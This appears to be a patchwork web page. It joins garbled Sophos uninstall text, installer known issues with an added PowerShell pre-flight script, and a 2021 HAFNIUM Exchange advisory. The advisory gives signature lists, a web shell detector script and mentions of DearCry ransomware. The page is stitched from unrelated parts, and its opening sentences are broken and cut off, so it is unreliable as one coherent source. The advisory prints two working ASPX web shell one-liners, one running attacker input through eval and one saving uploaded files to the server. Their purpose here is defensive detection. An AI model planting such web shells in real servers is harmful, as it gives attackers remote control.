Sophos Antivirus Server

Posted on  by admin

Restart the computer or server. Turn off tamper protection on the computer or server. Note: Unlock the server before uninstalling Sophos. Go to the Servers list, then under the Lockdown status column, click Unlock for the target server. Sophos Anti-Virus has been updated to support changes in the Windows Server 1709 release. Sophos Device Control has been updated to support the latest devices from.

Known issues and limitations

Known issues and limitations, listed by ID, affected component and a description of the issue.
Issue ID: WINEP-1577
Component: Sophos Central agent installer
Description: The logged-on user who runs SophosInstall.exe must be a member of the SophosAdministrator group in order to migrate an on-premise-managed computer to Sophos Central. Otherwise, the installation will fail.

If you have experienced this issue, add the user account to the SophosAdministrator group and re-run the installer.

Issue ID: WINEP-1423
Component: Sophos Central agent installer
Description: When migrating an on-premise-managed computer to Sophos Central, a Sophos endpoint software update running at the same time may cause the installation to fail. This happens when a computer is migrated without using the Sophos Central Migration Tool, by running the Sophos Central agent installer (SophosInstall.exe) on the computer either interactively or in quiet mode. The update frequency is configured in Sophos Enterprise Console (Updating Policy > Schedule tab > Check for updates every n minutes) by the Sophos Enterprise Console administrator.

To avoid or work around this issue, you can do either of the following:

  • Stop the Sophos AutoUpdate Service before running the Sophos Central agent installer.
    1. Check the updating status by right-clicking the Sophos shield in the notification area in the taskbar and ensuring that View updating status is grayed out and cannot be selected. If an update is currently in progress, wait for it to complete before continuing.
    2. Open Windows services: depending on your operating system, click Start > Run and type “services.msc”, or click Start, type “services.msc” in the Start menu search box, and then press Enter.
    3. Right-click on the Sophos AutoUpdate Service and select Stop.
  • Increase the update interval in the updating policy in Sophos Enterprise Console to 60 minutes before starting the migration.
  • If you have experienced this error, re-run the installer at a later time when no update is in progress.
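As an added example (not Sophos' own tooling or documentation), the following PowerShell script performs the pre-flight checks these two known issues call for before launching SophosInstall.exe: it verifies that the logged-on user's token carries SophosAdministrator membership (WINEP-1577) and stops the Sophos AutoUpdate Service, waiting for it to reach the Stopped state (WINEP-1423). It assumes the group name and service display name are exactly as written above, uses a placeholder installer path, and leaves the quiet-mode switch empty because this post does not give it.

```powershell
# Added example, not Sophos' own script. Pre-flight checks for migrating an
# on-premise-managed computer to Sophos Central with SophosInstall.exe.
# Assumptions: local group 'SophosAdministrator' and service display name
# 'Sophos AutoUpdate Service', as named in the known-issues text; the
# installer path is a placeholder. Run from an elevated PowerShell session.
param(
    [string]$InstallerPath = 'C:\Temp\SophosInstall.exe',   # placeholder path
    [string[]]$InstallerArgs = @()                           # quiet-mode switch is not given in this post
)

function Test-SophosAdminMembership {
    # WINEP-1577: the installer fails unless the logged-on user is in SophosAdministrator.
    # Token groups reflect membership at logon, so a user just added to the group
    # must log off and on before this returns $true.
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    foreach ($sid in $identity.Groups) {
        try {
            $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
        } catch {
            continue   # unresolvable (orphaned) group SID; skip it
        }
        if ($name -like '*\SophosAdministrator') { return $true }
    }
    return $false
}

function Stop-SophosAutoUpdate {
    # WINEP-1423: an update that runs during installation can fail the migration.
    # Stop the updater first and wait until the service manager reports it stopped.
    $svc = Get-Service -DisplayName 'Sophos AutoUpdate Service' -ErrorAction Stop
    if ($svc.Status -ne 'Stopped') {
        Stop-Service -InputObject $svc -Force -ErrorAction Stop
        $svc.WaitForStatus('Stopped', [TimeSpan]::FromSeconds(60))
    }
    $svc.Refresh()
    return $svc.Status
}

if (-not (Test-SophosAdminMembership)) {
    throw 'Logged-on user is not a member of SophosAdministrator; add the account, log off and on, then re-run.'
}

# Step 1 above (confirming via the shield menu that no update is in progress) is a
# manual check; do it before running this, because stopping the service mid-update
# is exactly what that step warns against.
$status = Stop-SophosAutoUpdate
Write-Host "Sophos AutoUpdate Service is $status; launching $InstallerPath"

# Build the Start-Process call with splatting so an empty argument list is simply omitted.
$startArgs = @{ FilePath = $InstallerPath; Wait = $true; PassThru = $true }
if ($InstallerArgs.Count -gt 0) { $startArgs.ArgumentList = $InstallerArgs }
$proc = Start-Process @startArgs
if ($proc.ExitCode -ne 0) {
    throw "SophosInstall.exe exited with code $($proc.ExitCode); if an update started meanwhile, re-run it once the update completes."
}
```

The membership test reads the current logon token rather than enumerating the local group, which is why a freshly added account still needs a new logon session; the service stop uses the display name the text gives, so adjust it if your build reports a different one.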

Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

Sophos protections against HAFNIUM

Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Sophos Firewall

IPS signatures for customers running SFOS and XFOS:

CVE             SID
CVE-2021-26855  57241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-26857  57233, 57234
CVE-2021-26858  57245, 57246
CVE-2021-27065  57245, 57246

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

CVE             SID
CVE-2021-26855  57241, 57242, 57243, 57244
CVE-2021-26857  57233, 57234
CVE-2021-26858  57245, 57246
CVE-2021-27065  57245, 57246

If you see these detection names on your networks you should investigate further and remediate.

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/ASPDoor-U
  • Troj/ASPDoor-V
  • Troj/AspScChk-A
  • Troj/Bckdr-RXD
  • Troj/WebShel-O
  • Troj/WebShel-P

Other payloads

  • Mal/Chopper-A
  • Mal/Chopper-B
  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field, for example:

ExternalUrl: http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>

ExternalUrl: http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>
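The ExternalUrl check, as an added example that is not Sophos' EDR query: a PowerShell function that flags OAB ExternalUrl values carrying embedded server-side script, run here against constructed samples (the two shells quoted above plus a benign URL). The Get-OabVirtualDirectory line at the end assumes an Exchange Management Shell and is shown only as the way to feed live values into the same function.

```powershell
# Added example, not Sophos' EDR query. Flags OAB ExternalUrl values that embed
# server-side script, the pattern shown in the two samples above. The inputs
# here are constructed; the Exchange cmdlet at the end is an assumption about
# how to pull live values and is commented out.

function Test-SuspiciousExternalUrl {
    param([Parameter(Mandatory)][string]$Url)
    # A legitimate ExternalUrl is a plain https URL. A web shell smuggles a
    # <script runat="server"> block with a Page_Load handler into the value, so
    # any one of these markers is enough to flag it for investigation.
    $markers = @(
        '<script',
        'runat\s*=\s*["'']?server',
        'Page_Load',
        '\beval\s*\(',
        'Request\.Files',
        'Server\.MapPath'
    )
    foreach ($m in $markers) {
        if ($Url -match $m) { return $true }   # -match is case-insensitive by default
    }
    return $false
}

# Constructed sample values: one benign URL and the two shells quoted in the post.
$samples = @(
    'https://mail.example.com/OAB',
    'http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>',
    'http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>'
)

foreach ($s in $samples) {
    $flag = if (Test-SuspiciousExternalUrl -Url $s) { 'SUSPICIOUS' } else { 'ok' }
    '{0,-10} {1}' -f $flag, $s
}

# Live use on an Exchange server (assumed cmdlet; run in the Exchange Management Shell):
# Get-OabVirtualDirectory -ADPropertiesOnly |
#     Where-Object { Test-SuspiciousExternalUrl -Url "$($_.ExternalUrl)" } |
#     Format-List Server, ExternalUrl
```

Because the shell is blocked but not removed (see the note on manual removal above), a hit from this check is a prompt to pull the OAB configuration and the underlying .aspx files for the MTR-style investigation rather than a remediation by itself.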

Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the Hafnium group in their attacks. Sophos Intercept X detects and blocks DearCry via:

  • Troj/Ransom-GFE
  • CryptoGuard

Editor note: Post updated with addition of IPS signatures for Sophos UTM and additional detections. 2021-03-10 08:35 UTC

Editor note: Post updated with additional anti-malware signatures for Intercept X and Sophos Antivirus (SAV) 2021-03-11 14:30 UTC

Editor note: Post updated to advise that signatures are now present on the Endpoint IPS, and the addition of two further AV signatures 2021-03-12 09:10 UTC

Editor note: Post updated with DearCry ransomware detections 2021-03-12 16:30 UTC